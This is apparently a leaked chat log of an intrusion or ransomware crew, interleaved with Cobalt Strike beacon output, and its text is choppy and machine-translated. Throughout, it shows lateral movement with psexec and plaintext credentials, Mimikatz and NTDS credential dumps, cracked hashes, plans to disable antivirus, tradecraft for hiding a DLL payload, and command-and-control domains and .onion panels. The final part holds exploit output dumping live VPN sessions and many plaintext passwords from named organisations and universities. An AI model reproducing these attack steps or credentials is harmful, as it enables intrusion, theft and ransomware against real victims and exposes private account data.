[*] Tasked beacon to run: net use G: \192.168.168.66\C$\temp /user:PKGPROD\jess Payables5150
[+] host called home, sent: 98 bytes
[+] received output:
System error 86 has occurred.

The specified network password is not correct.


``Does anyone read the conclusion?

user2-3 beacon> shell net use G: \192.168.168.66\C$\temp /user:PKGPROD\jess Payables5150
[*] Tasked beacon to run: net use G: \192.168.168.66\C$\temp /user:PKGPROD\jess Payables5150
[+] host called home, sent: 98 bytes
[+] received output:
System error 86 has occurred.

The specified network password is not correct.

``The pole is fine and there was no foul play on his part because
```
Last logon 7/16/2020 2:06:23 PM
``lol)he just didn't press ``rev2self``@user7 try net use with the YES creds on dcwhy do you get different output from the same command?
beacon> shell net user Linux /dom
[*] Tasked beacon to run: net user Linux /dom
[+] host called home, sent: 50 bytes
[+] received output:
The request will be processed at a domain controller for domain pkgprod.local.

User name linux
Full Name Linux
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 6/12/2014 11:20:21 AM
Password expires Never
Password changeable 6/13/2014 11:20:21 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 7/16/2020 2:06:23 PM

Logon hours allowed All

Local Group Memberships *Administrators
Global Group memberships *Group Policy Creator *Domain Admins
                             *Enterprise Admins *Domain Users
                             *Schema Admins
The command completed successfully.

```shell net user Linux /dom have a problem with the session on the dk? Yes, I see, I didn't notice)`` It's written there, but thank you)``
kerberos :
	 * Username : Linux
	 * Domain : PKGPROD
	 * Password : Pack5156
the question is why is it better to hurry up the question is why YES came, mb anomalous activity and will reboot yes, it is better to jump to dk first? then dump the ntdslol)and from where? which way? got the password from yes
```
Authentication Id : 0 ; 680664956 (00000000:28921f7c)
Session : NewCredentials from 2
User Name : jess
Domain : PKGPROD
Logon Server : (null)
Logon Time : 9/18/2020 9:26:21 AM
SID : S-1-5-21-4059064934-1889560214-2984304678-1162
	msv :
	 [00000003] Primary
	 * Username : Linux
	 * Domain : PKGPROD
	 * NTLM : c40ce4eab245d09bead615fd67e59a77
	 * SHA1 : b6fc4dbe67cd7fcc4278a842803c0ff294098f57
	 * DPAPI : b4172b5b7931728b8f4abb6a6f85b2f2
	tspkg :
	wdigest :
	 * Username : Linux
	 * Domain : PKGPROD
	 * Password : (null)
	kerberos :
	 * Username : Linux
	 * Domain : PKGPROD
	 * Password : Pack5156
	ssp :
	credman :
``user5 you do not pull servers in coba before the shutdown @user4 coba in ls@user3 to @user8 byeHello all :space_invader:helloTill what time? Yesterday I read something about it yes, there is a skul server, in powerupsql says that should [machine]/instanseName specify...talk about spns? There is a thought to poke the skul, but do not know how to learn the name of the instanse object? or to test from msfas is meaning to find additional modules all patched not to attack but to scan YES not taken? The day before yesterday changed passwords, deleted unnecessary YES. Nashuemel maybe why were burned? groups can write through #stanthonyskc-com more `stanthonyskc.com`STAKC in the works, but there we are probably spalichto us in the workspanki hoihiPrievest who?
7dfa0531d73101ca080c7379a9bff1c7 P@ssw0rd123!
62e68029812e6498197aaa32824c183e P1v0t@l
25228f174278a82e7202a25df2d9923b Operator2010

``Dump these hashes
```
7dfa0531d73101ca080c7379a9bff1c7
62e68029812e6498197aaa32824c183e
25228f174278a82e7202a25df2d9923b
``like a strange dc in the UK domain
I dumped his sysinfo into toolspanel
the new dll crashes there as well, but it doesn't show up on the AB ``
>dNSHostName: DCWAS45.Wilsonart.com
>description: Symantec End Point Management Server
 
Ping statistics for 170.7.76.245:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>dNSHostName: FLWAS03.Wilsonart.com
>description: PROD Symantec AntiVirus Management Server
 
Ping statistics for 170.7.20.198:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss)
I'm coming to the group in the TV, if anything Deb[ ](https://mediaeveryone.com/group/wilsonart-com?msg=GYkZN2djRqCXM8dDY) who did not come? we group created by the boss and added depa there. and now he does not respond there I sent you two times have you written to depa?in shelter, there's nothing to gather (we need to solve something with dll - simantik chopped, so we can not get through to about 4 or 6 other domains (only 4 domains want to get through))) today do not want to close? how are you doing?
it's in cmd /c they're next to each other, it makes no sense i've tried it that way
```
remote-exec psexec 170.7.76.170 cmd /c C:\Windows\Temp\7za a ntds-eu.7z C:\Windows\Temp\ntds
``No one knows what's wrong? [ ](https://mediaeveryone.com/group/wilsonart-com?msg=KWRNtkPsgfdHoqWgC) paths are relative. ``French2014, please send me more of this hash.
```
fd20144890966cfb2300ec6629249cab
``````

pip install impacket
pip install pycrypto
pip install pyasn1
apt-get install python-dev

all files are placed in the same folder together with the script, there will be 4

secretsdump.py -ntds ntds.dit -system SYSTEM -outputfile result local
``Where is the error here?
remote-exec psexec 170.7.76.170 cmd /c C:\Windows\Temp\7za a ntds-eu.7z ntds
ntds-eu 7z ntds also bypassed no, haven't tried that.I mean the load on port 80 in the coboo is absent on port 80 have you tried that? -and bind by psexec through normal psexec ?neither in coboo nor in msf doesn't fly through[ ](https://mediaeveryone.com/group/wilsonart-com?msg=fCNHA6TDppNxAceio) would be so easy.in that domain 80% of the servers on 2003)and whatever 2003 just hashdump make dc on 2003? I don't think so.ntdsutil
ntdsutil "ac in ntds" "ifm" "cr fu C:\windows\Temp\ntds" q q
```
did it ever work on 2003? ``Dell@2020````
4bcba61efb7ce5e848ec339394829572
```
@tl1 throw in the Kmd5 unpacked
ukwadc01.uk.wilsonart.com [170.7.70.214]
``answer - no it's not possible to mount dkprosto clarify if the question stood up @user9 a misunderstanding came upa forget it, I confused you didn't understand where dk todk in the group of crits servers)yes to him)ah, I thought you about the second domain)))
and the question was to @user8)well mount dk not need all the same mb... )I do not understand)well dk sees)external servers see? what edr?
HQTAS73.Wilsonart.com
DEVBIOBI.Wilsonart.com
``[ ](https://mediaeveryone.com/group/wilsonart-com?msg=LsGJ6Paosc8cpwbSS) well there is and there is, the main thing when you come inno place search for a place to run there are many where the folder yes there is if not then do not throw? for example, backup, veeam, production ... and also the server is not in the crits group of servers possible more rules to select the server under the percis on the server is started by the system and is run by the staff
masked in the folder system32
schtasks /query - check whether the stack was created after the execution (dll creates the stack after launching)
delete the task which was launched

Server is selected where there are no active YES and EA processes and where YES or EA have not visited for a long time
(check users folders for date of change)
the server does not belong to a crisis group of servers, for example, backup, veeam, production ... people responsible for the forum, then move there@user9 please describe here for all do not remember the rules will do? if you think I do not interfere) would give the go-ahead that remember would immediately throw another thing the rules we remember, so brainstorm the same
on the second network help guys just asked a question and silencea where did you get them?) or your own? and you give us them?) rules remember? drop a couple of dllnet here do not drop, right? `VMware vCenter 6.0 Server DCWAS79````
>description: Symantec End Point Management Server
>dNSHostName: DCWAS45.Wilsonart.com

>description: PROD Symantec AntiVirus Management Server
>dNSHostName: FLWAS03.Wilsonart.com
>description: PROD Symantec AntiVirus Management Server
 Directory of C:\Windows\Temp\ntds

12/23/2020 06:00 PM <DIR> .
12/23/2020 06:00 PM <DIR> .
12/23/2020 06:00 PM <DIR> Active Directory
12/23/2020 06:00 PM <DIR> registry
               0 File(s) 0 bytes
               4 Dir(s) 55,007,834,112 bytes free

The current time is: 13:19:19.88 It's the middle of the day, right? Yeah, let's hope that everything was successful all offeshas still check the area, if available ready) yes it's not clearav switched on?Z1NPS1 - linux, Z1SDEPLOY - no file is not cheknu other hell is there, but the token worked as razvfail? Z1AD3: 192.168.1.41 - this dkeesh not looked, now domain authorization?
Z1AGILITYAPP: 10.10.0.17
Z1SDEPLOY: 10.10.0.57
Z1INFOLINK: 192.168.1.224
Z1AD3: 192.168.1.41
Z1CA1: 10.10.0.5
Z1NPS1: 10.10.0.56
```
This is what's online now, I'll take a closer look at the tops and check if all servers are ok/not ok other servers check domain3, what kind of delays they have left?
57 servers pinged, 67 in total.
41 pulled in, 9 lines, 7 mapped disks.
140 armies pinged - 278 in total
managed to ping 40-45ox now
or did the end of the day coincide and all the armies went offline) if the servers reboot and the build does not finish the work all will fuck up a little bit armies all put the new mappings servers we probably disabled win-def and av
we got burned, changed some people's passwords
we started to unhook the armasmas mapped two of them?) it was their own doing) check it out then start 10-15 pcs and started right away? at the last stage of the armas mapped you did not start? we all pulled the server to start laying it out so
We've been burned. We're pulling servers, we're mapping armas. How's your progress?
[+] received output:
192.168.20.129:445 (platform: 500 version: 10.0 name: CF-RPA05 domain: CEDARFINANCIAL)

[+] received output:
192.168.20.110:445 (platform: 500 version: 6.3 name: CF-HQ-RADIUS domain: CEDARFINANCIAL)

[+] received output:
192.168.20.109:445 (platform: 500 version: 10.0 name: CF-HQ-DV domain: CEDARFINANCIAL)
192.168.20.113:445 (platform: 500 version: 10.0 name: CF-RPA03 domain: CEDARFINANCIAL)

[+] received output:
192.168.20.125:445 (platform: 500 version: 10.0 name: CF-RPA02 domain: CEDARFINANCIAL)
Scanner module is complete

[*] Checking for MS17-010 vulnerability on ip:192.168.20.129
[+] host called home, sent: 3021 bytes
[+] received output:
Connecting...
[+] received output:
Connection Error: connection to port 445 is denied
``and this is my admin BLEEP! he has a directive to keep our projects as a priority Nee still very much missedPanel I understand that the current admin went head to head with the teamlid on their projects Where?)it seems that we need to look for a new admina with Tore as I think it's better done with clearing can find on the dns what anomalies bots reserchers or who knows what the fuck tied to direct access through the domain onlythere is a simple logic from my side and do not see advantages in torebo do not like lagisubjective truth I prefer clearing all different say can you consult with your on this issue?I don't know if it makes any difference to us) I'm kind of thinking the same thing, maybe in our case, tor = clear for the feds if you move to clear you need to remove all external data in case of removal of the so vyrobno so nauseating)me in fact torav tor3 different sections with a full page load to make adjustments + availableadmins give the rights to the case there yuzabili not very))) I looked in the ehe all fuckin naponavlena everything where my domains all appeared not[ ](https://mediaeveryone.com/direct/Rmne8eAkiu37dhmzyJcaRFnKQqepiffHq?msg=584ipFCpgaphYXcc) only the admin? i see... see... read... cry.... not different
but i can only see admin in yours all fuck it, my ass is on fire can i add them to mine if they are not different do i have to prescribe them for all my users? which lusthope/periodprescribed you have a parameter only for admin listen nothing flies (put them as soon as you read them also put them in the brute force section through edithttps://ws4nrdkwmjbxrv56pn4knxaex6ttwnjbdrshd6gfq2hw324ugwlgwfad.onion/uessparameter domain and select their polzakov, do not forget to limit the period and lusthonvyvy choose here edit opposite the anchor (dll,ehe) - confighttps://ws4nrdkwmjbxrv56pn4knxaex6ttwnjbdrshd6gfq2hw324ugwlgwfad.onion/тооІѕрегаешь their domains herehttp://ws4nrdkwmjbxrv56pn4knxaex6ttwnjbdrshd6gfq2hw324ugwlgwfad.onion/distinopagesa please tell me how to set my users in the toolpanel so they can generate anchor?
try somewhere else to put the blocker in the wayFolder: \Microsoft\Windows\BitLocker
TaskName Next Run Time Status
======================================== ====================== ===============
BitLocker Encrypt All Drives N/A Ready
BitLocker MDM policy Refresh N/A Ready I'm doing a search for HQ # and can't find it.rundll32 C:\Users\Dorinda.alredge\appdata\roaming\Adobe\cache.dll,Control_RunDLLdll is not in place of the stack not run like that? beacon> shell rundll32 C:\Users\Dorinda.alredge\appdata\roaming\Adobe\cache.dll entruPointda where? we have in the common rocket? which ankbekdorpishi in the channel directodomen changed to their vindef not palitaga ok who is responsible for admins? on mine no httpsspass thanks)you're welcome)i can drop dead bots from their zakrepov koji 93 pcs?aha okekpost update on tulspaneli poured immediately on the check them to their own then https://dyncheck.com/scan/id/1e37fc86492658d48561c7e4f69eb3cdmme the domains have given one check updates) ahaaerezalizayut in tulpanel? tookhttp://dyncheck.com/scan/id/7bd312303566339897552de90bf1c560within tulpanelikor who?vindef palitz all fucked up //dyncheck.com/scan/id/c986a3c2ff98cc338cc1d58c9db9c000cncnc for today then these 2 then? but it's a long time at bentley will take mine) think not)levf. ytn0 just if i kill you will work differently took these 2
Tell me if I don't kill your domains? I'll take these 2 then on my admin panel I have it written down that these domains are mine.
muncuc.com
farfaris.com
homilistana.com
omelezatava.com
fikjtyun.com
jetbiokleas.com
nyhgloksa.com
onvegokaue.com
``I understand the second link on the second ank''
 muncuc.com,farfaris.com
omelezatava.com,fikjtyun.com
``How the fuck should I know?'',omelezatava.com,fikjtyun.com Which ones for the office? These are yours for the main one```
DOMAINS
muncuc.com
farfaris.com
i used to attach these domains to your domains remember? you alive? i think i'll attach them on the fly? i'll debug this shit, i've been working on it for 24 hours, i had problems with launching the dlltams, i figured out that only 3 servers are catching form on the first day on all 3!
[+] Location: C:\windows\temp\MRT\*

 Size Type Last Modified Name
 ---- ---- ------------------- ----
 205.6KB fil 12/27/2020 17:43:59 vminst.dll
            fil 01/19/2021 06:30:24 vminst.log
``````
 Directory of \ovrscweb1\c$\windows\temp\MRT

01/19/2021 03:51 PM 0 vminst.log

``o_o``.
 Directory of \ovrscweb2\c$\windows\temp\MRT

01/19/2021 03:47 PM 0 vminst.log
               1 File(s) 0 bytes
               0 Dir(s) 68,013,015,040 bytes free

What's up there? What the fuck's up in Overlander? They're just buying access from all sides?
fuck it
go to
# palyoad the fuck up #
and work as a cobo.
https://mydesktop.kingston.ac.uk/portal/webclient/index.html
USER: k1945880@kingston.ac.uk
PASS: Thanzeeh77
```

And also YUK university also think it is worthwhile now to go on the rdpveb? purely to get a license and to get fixed "in the desk" this university it is unlikely that there should be difficult, but pick someone try to go up```.
https://vpn.umontreal.ca/dana-na/auth/url_default/welcome.cgi
USER: p1204216
PASS: Des99714
so it depends on the outcome of the decision.
do you want to take the job? I'll mark which are the priority to open what will open) revenus don't give a fuck anyway ok + esfox_com_ad_users.txt I honestly have a hard time collecting you can sign revenus if you have in this format will pass) esfox_com_ad_users.txt tell me how to do) esfox_com_636kk.txt
will it be ok in this form? ok I'll do it Yesterday I spent most of the day collecting files from the confiessional since we'll be moving the files I'll just parse them already) Well, to reopen where? also pass the work to globalmarkstatik
I'll do it now.
i'll give it a priority, just sign the domain in the file name, they need only ad_user? i'll dig through my archives at the same time
i have something with ntDSs, i think i'll give you to reopen it tomorrow? i thought maybe i could reopen it today, but it didn't work according to bicon logs?the idea failedda and i don't have the listing, i don't have the log files from the tachkanet they don't give a fuck about the trick, we had a file listing, we just uploaded the assembled file to the mega with the size of the listing but with the locale format to merge the database i can't get back there there people are ready to pay the date i did not download from an important case serious i had a fuckup here(((there is a lot of fucking stuff to do) why aren't you asleep?i'm not going anywhere. 3 hours, that's no time at all. when you're done with your chores, we'll probably run through some more. yeah.
patch on a particular holea, I still have to prepare files to reopenadvizori? yes not patched so straight away was not advizori ... already released a patch that lisoniki chet sploit glitchy it fixes soniki wait? that's it like that ... I'll do the brut from globaltranzav five kovyty her) grid on lardbilimora you have anything to work with today?i can't remember anything else))) mmmmm deadline for tomorrow it's already been ordered by the augabrooks and kermit guys there's cobalt testing to be deployed ehhh i got lost can you remind me of my tasks now it'll be weird we wrote yesterday so i'm taking tomorrow deadline listen to this
there's gonna be a download soon, right? fuckin' great
i'm just sleepy. how's it going?) hi there, tomorrow by 12:00+retif.com, plzbukkammer no one's got any webmorda2auth+pozhaylustamen add to it so far only adinfu has time to throw out of there fast. that's where yes`grantweber.com
I checked everyone in the first one, no one has any bookmarks.
in the second without 2fa, go through the client, almost immediately throws out, butch more men seem to move?
[+] Checking URL https://172.81.67.174
[+] Found old SMA version (<9.x)
[+] Appliance running version 9.0.0.2-13sv

[+] Leaking sessions to dump configuration.
[+] Attempting to dump sessions from https://172.81.67.174
      [+] Found: SessionID: 0nwEo7juJp9uceT0bhNC2hMM7VuvDFIjyC5LyKjx6fQ= userType: 1 userName: dscully Password: Scully2@ Domain: retif
      [+] Found: SessionID: 3mzEGy480eoTW0PVGB4WkTx1pBcNckgNRvimSDRWboM= userType: 1 userName: acatalanotto Password: vera1010 Domain: retif
      [+] Found: SessionID: 6nkViGzUAfwhcy9EQTC4B1cnAJKVmuLVBoJQnaDHKKI= userType: 1 userName: rblanchard Password: abcd@1234 Domain: retif
      [+] Found: SessionID: 7180aU0jSdpraYLUADh6OpRYJJZekIHXoo2xT8XjI1tM= userType: 1 userName: anguyen Password: Car47029 Domain: retif
      [+] Found: SessionID: ClOqhz81D1QDthdUyzSnIFF3f9qpwBDnv6lJAueAMI= userType: 1 userName: dstoutin Password: C@ryH@milton Domain: retif
      [+] Found: SessionID: IMGyFJ3dmPSncBddBfqJzy5C9W0heL1wY02V35a3Ei8= userType: 1 userName: dblanchard Password: Tujaques2 Domain: retif
      [+] Found: SessionID: NrRgAAQeaCc1nMajX8HGk4ySOyKy89nDEs5Dbfm7JAtA= userType: 1 userName: mcooper Password: !Crystal2 Domain: retif
      [+] Found: SessionID: W1ed6V04FqvC8gm29587VfRoeqi7xvSIltpz1O6txrw= userType: 1 userName: lotrocki Password: Lisa0759 Domain: retif
      [+] Found: SessionID: WMhTxZjMPY1fIXps0WPYYA2kgbnnKD1fQxQm5tbuEoI= userType: 1 userName: jdufrene Password: Memphis3 Domain: retif
      [+] Found: SessionID: ZuQ9mTRTfwnBvo01zvkWjbiEpg08U9ZZtdH7rXiISAg= userType: 1 userName: hnguyen Password: Jan_2021 Domain: retif
      [+] Found: SessionID: dN616QT3BLlfjo6XWoSaQVHJnAngQo6LiTVFH30xc4w= userType: 1 userName: Pschmidt Password: AKLfefe1988!!! Domain: retif
      [+] Found: SessionID: e6cwRd0MGWQZVZHmX09ldTrZdr4VC23Cm4qU1V41dZ0w= userType: 1 userName: lgagnet Password: Minto123* Domain: retif
      [+] Found: SessionID: eI0R46CQYycD1NLEwpoEdF9nHtx7vpteNugSjYFj9tg= userType: 1 userName: awashington Password: 0ilTruck! Domain: retif
      [+] Found: SessionID: jgdazqQh0tgr1o8MG6ikF2184YZzRokNrHb1PTyin5c= userType: 1 userName: msepter Password: abcd@1234$ Domain: retif
      [+] Found: SessionID: jwAGVr88UefTCwRfR9L4c8yeyRQAEFQlVtois0VO7X0= userType: 1 userName: lfisher Password: Alexander14 Domain: retif
      [+] Found: SessionID: jyQ0Ho1OBKlJSAVMstBiz1MvRXBKywGB0XYEiwMfcg= userType: 1 userName: jrusso Password: 504Jamie#@! Domain: retif
      [+] Found: SessionID: oNbdkn6iFhSvXfc3yvNApWNCg71kcTk1Lky2pn04jY= userType: 1 userName: kjones Password: Dothan24! Domain: retif
      [+] Found: SessionID: s27ilDCfc00iQPuHM0LueLSKoC8i4a4eT4A1D5LbNPQ= userType: 1 userName: lcoriell Password: Jutland@1840 Domain: retif
      [+] Found: SessionID: uapufXbKjgRslg2pFYEmT8b5PkKO9s4N5stplyxkEfQ= userType: 1 userName: tragas Password: Troll112// Domain: retif
      [+] Found: SessionID: x7QnRi1w6uhqEK3E3z7XUPKtgDcbYWWaFCPNbG0idLI= userType: 1 userName: ehicks Password: H@ppyD@y1 Domain: retif
      [+] Found: SessionID: xtxwXEVx0Rp5h8Lc40tMB5kMB5kBQTvFpLfdXxYP3UPOH6o= userType: 1 userName: barcement Password: Ba041913* Domain: retif
      [+] Found: SessionID: y43yuwBMnVBmeEEjwC6k8yRxce0p619bb2U6IU8rg8= userType: 1 userName: dwinter Password: Blair127! Domain: retif
      [+] Found: SessionID: zxKhq2SRlYmt17y2UOP1BXEwyh00UCkDAgUKb2HL2PU= userType: 1 userName: ehassell Password: Amelia#0130 Domain: retif
[+] Done with https://172.81.67.174, found 23 sessions
23
[+] Saving session data
[+] Trying session 0nwEo7juJp9uceT0bhNC2hMM7VuvDFIjyC5LyKjx6fQ=
[+] Saving config to ./Dumps/172.81.67.174/config.sqlite
[==================================================]
[+] Config dumped
[+] Parsing configuration data

[+] Finding users
[+] Found 78 users


[+] Finding AD credentials
[!!!] Found Active Directory creds
[+] AD creds Administrator:Manresa02#@10.1.10.210

[+] Looking for LDAP domain credentials
[-] No LDAP credentials found.

[+] Looking for RADIUS domain creds
[-] No usable RADIUS domain data

[+] Parsing bookmarks
[+] Found bookmarks, Hunting for creds
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 4, 'name': 'Retif Terminal Server', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'rtfterm.retifnet.retif.com'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 4, 'name': 'PDI Terminal Server', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'rtfpditermprd.retifnet.retif.com'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 6, 'name': 'MAS90 Terminal for ehicks', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'jut-ehmaas.retifnet.retif.com'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 41, 'name': 'Desktop', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'JUT-JHARTLEY2.retifnet.retif.com'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 39, 'name': 'L Fisher Desktop', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'JUT-LFISHER.retifnet.retif.com'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 67, 'name': 'Office Desktop', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.1.10.72'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 71, 'name': 'PDI Terminal Server', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'rtfpditermprd.retifnet.retif.com'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 71, 'name': 'Retif Terminal Server', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'rtfterm.retifnet.retif.com'}
``and there's also one more crack in the works right now''.
[+] Checking URL https://173.247.171.106
[+] Found latest version (9.x+) of SMA appliance
[+] Appliance running version 10.2.0.1-18sv

[+] Leaking sessions to dump configuration.
      [+] Found: SessionID: 08wKU0nD0NHM018GdPixkSp0veaEEfUNs1sfY3emGN8= userType: 1 userName: connie.arteaga Password: Clevs8787 Domain: Beyond
      [+] Found: SessionID: 1EYTlhUHb3WlJkyj6scGx0d1E45q4HdXA1KqyU8IXYs= userType: 1 userName: jim.movius Password: Grant3333 Domain: Beyond
      [+] Found: SessionID: 1Yw1sPSEQbDO1nbNbjTBcBcHdiJImQaNz1I1lwAmnxOSSE= userType: 1 userName: Steven.Craig Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: 1nOvfdxEtWVea0UkJvtNyIwBLP0O79CE8E1GZZdONc= userType: 1 userName: steve.price Password: Incorrect100 Domain: Beyond
      [+] Found: SessionID: 3HZDekmljv4atHltwUxKNQY1S0v1jlgw1TtNSAZG7pw= userType: 1 userName: Leslie.Avalos Password: Grantweber2018 Domain: Beyond
      [+] Found: SessionID: 98xPB0MpOWeItn9GWgS93plCOLbFch0X9xFcN8shiag= userType: 1 userName: kailani.gaspar Password: v1nce2307 Domain: Beyond
      [+] Found: SessionID: Cf3UjAwYoQgvqTHWxkBX3gdrOM6syrTuecLKh05qUoc= userType: 1 userName: robert.nye Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: EYZKipX33P9zsCZ6se1WIx01zUkyMFdBRQcmLlADkhw= userType: 1 userName: pilar.zuniga Password: basiaZ1929 Domain: Beyond
      [+] Found: SessionID: HDREC6P5KFHGoW1vGbZLyTQxGc5aUNHzuaMgVHE2KOk= userType: 1 userName: Rodolfo.Maldonado Password: Grant2021* Domain: Beyond
      [+] Found: SessionID: Ikd51149NxTHZFsSlmFzmcgqGvEAR4jfGWqL9nEJQhg= userType: 1 userName: joanna.gallegos Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: J1cTnjaQPil0T86G0S6JkLE0a3AA41xSB3oJ2C1nDPg= userType: 1 userName: tony.aguayo Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: KMDs2M9R8fDa79OTo8S348NFJvJvBp0QiRPbTsMK14Gmc= userType: 1 userName: Denise.Williams Password: Grant2016 Domain: Impact
      [+] Found: SessionID: LdFQ9ghPD0O5mIJt7WkT7v2K1SJwhcf2GhiALf7WUxI= userType: 1 userName: Luis.Fernandez Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: MB61rZaVHu4Fd01rTiNb4ebPSv37ciFbWGyjHPojus= userType: 1 userName: Jung.Lee Password: Lebron2021 Domain: Beyond
      [+] Found: SessionID: PGMscMXIm0PGyWz1SLfpcZFFViP2Qhkh9oLDjmYbGANM= userType: 1 userName: Jeff.Moeller Password: Bruce1967 Domain: Beyond
      [+] Found: SessionID: THdBDUwEn4S79iRjybPvDFo6t2YsFJ0sSrba7PoKa8= userType: 1 userName: bereniz.boss Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: VINYGOn933HMn1EVeh3Hqfo7DkyEswr3DZuEPnR2vr4= userType: 1 userName: joseph.monette Password: Vegas2020 Domain: Beyond
      [+] Found: SessionID: WUolvIMVxr5vU0R8400eH1nofJp4Eo5ztra4eil2pJ4= userType: 1 userName: josey.barrera Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: WZh28egsBep41ACBjFqqF1eRbVpPENVxx5LFZMfuoxs= userType: 1 userName: Steven.Mehr Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: XLg1SWXPoCO0tiowUdnblgUrdLUlco2PDzbbx81R8wg= userType: 1 userName: Sandra.Silva Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: XvG4d2mFJOWr11oUfdwZAS3TvjEilgl8kcHuAxbIRH8= userType: 1 userName: jason.allison Password: Grant2024 Domain: Beyond
      [+] Found: SessionID: ZNhJROmzHsCRwB81lAKDIyqcc97GM9nJVabiOVCadyM= userType: 1 userName: oscar.soto Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: a3ltPWpiKONzJ27EASYq5PpDjOPWB06ckP24q1oactM= userType: 1 userName: Eric.Mcinnis Password: Lolo702277 Domain: Beyond
      [+] Found: SessionID: d1CmeOs8Fg603rog8E8DDDEAgvd5dBnPhXDnsovWEbx8= userType: 1 userName: Nellie.Rosales Password: Nini2018# Domain: Beyond
      [+] Found: SessionID: dVTFvujUeSSwuweBIhzU2okUgnwcmrH51uoHojrkdbM= userType: 1 userName: jamie.ferreira Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: gCHZ4UatX97lMcsjhlYV6VcezzodohrVjB1HC7yQjKHo= userType: 1 userName: Sharon.Poole Password: Sharonp20201 Domain: Beyond
      [+] Found: SessionID: gGzMmC1Ze9b9RPZeA9itq4Mlf5BV6KfSmiRqdYa1g7A= userType: 1 userName: loraine.molina Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: gYy6AOPIOh0fSSbUXFDPcUuGqH95c00BNHn7WbRetSw= userType: 1 userName: melik.poghosyan Password: Grant1111 Domain: Beyond
      [+] Found: SessionID: jFgGjaqh1FvP0yy8iBKQiHiKLFPGCiEstDEN1pmoXY= userType: 1 userName: Janiece.Knott Password: Janiece1 Domain: Beyond
      [+] Found: SessionID: keWbTufTW0TAXNHwik99d1u9FbztTnyifCg1H5Zad34= userType: 1 userName: kyle.shorten Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: lEDnuPFpU0MJOE4kwqAfHuDWgKjGzSxCfikysyh1XM= userType: 1 userName: Frances.Guerrero Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: n1Ryw5Npa34yil3ClDr4rxwVVVE23YAIfnMq0ieYqLCIM= userType: 1 userName: jake.ortiz Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: nSSw2myFOc4UOOsB4ethYNEuQszC277jky8qdwbKOi0= userType: 1 userName: april.vance Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: nn9KyDegeC6Vso1CzrXrJVKESDgFERzGr1HUuhmiVNdY= userType: 1 userName: lluvia.aguayo Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: rhyybLubLCmo3rYUE319r5Hcx91oUzmDYSYhFMi9VU= userType: 1 userName: Zaineb.Hasan Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: rjtrDOMZRkaVU81LkI1SSYaQNzoop1ChrSfSvCe2Gg= userType: 1 userName: eric.holmes Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: sxM0QSrebzOJBsFq0m21ayCFmTE2oCSQ3rYFfGAghTE= userType: 1 userName: Chris.Brown Password: Grant2020 Domain: Sales
      [+] Found: SessionID: v19KVv1mCxhZFhq3eWrMMITArOMs2nrr34qYoWTYujU= userType: 1 userName: sabrina.buksh Password: 10066Buksh Domain: Beyond
      [+] Found: SessionID: verRB4sw28XB4A0eEI0ewLablalELYO83gfIDY96zyI= userType: 1 userName: dorothy.roscher Password: Dorothy1966$ Domain: Sales
      [+] Found: SessionID: wBlAIohH03mCi8XxyQLDs1YYa1BsTXm1k9FsrohXmaU= userType: 1 userName: luis.garcia Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: wU9MQsVIHBXhkNUHgYbVJUHiqmCrnsAsuihXW6LIUT8= userType: 1 userName: vincent.velardi Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: xR18vaBQUR6z2q4kOLGWehrPFbV3I5b1dVFsbAJwCDE= userType: 1 userName: Pedro.Campos Password: Grant1980! Domain: Beyond
[+] Done with https://173.247.171.106, found 42 sessions
42
[+] Saving session data
[+] Trying session 08wKU0nD0NHM018GdPixkSp0veaEEfUNs1sfY3emGN8=
[+] Saving config to ./Dumps/173.247.171.106/config.sqlite
[==================================================]
[+] Config dumped
[+] Parsing configuration data

[+] Finding users
[+] Found 88 users


[+] Finding AD credentials
[!!!] Found Active Directory creds
[+] AD creds :@10.10.10.5
[+] AD creds :@10.10.10.5
[+] AD creds administrator:2016GW@Calabasas@10.10.10.9
[+] AD creds :@10.10.10.7
[+] AD creds administrator:2016GW@Calabasas@10.10.10.9
[+] AD creds :@10.10.10.18
[+] AD creds :@10.10.10.18
[+] AD creds :@10.10.10.18
[+] AD creds :@10.10.10.18
[+] AD creds :@10.10.10.18
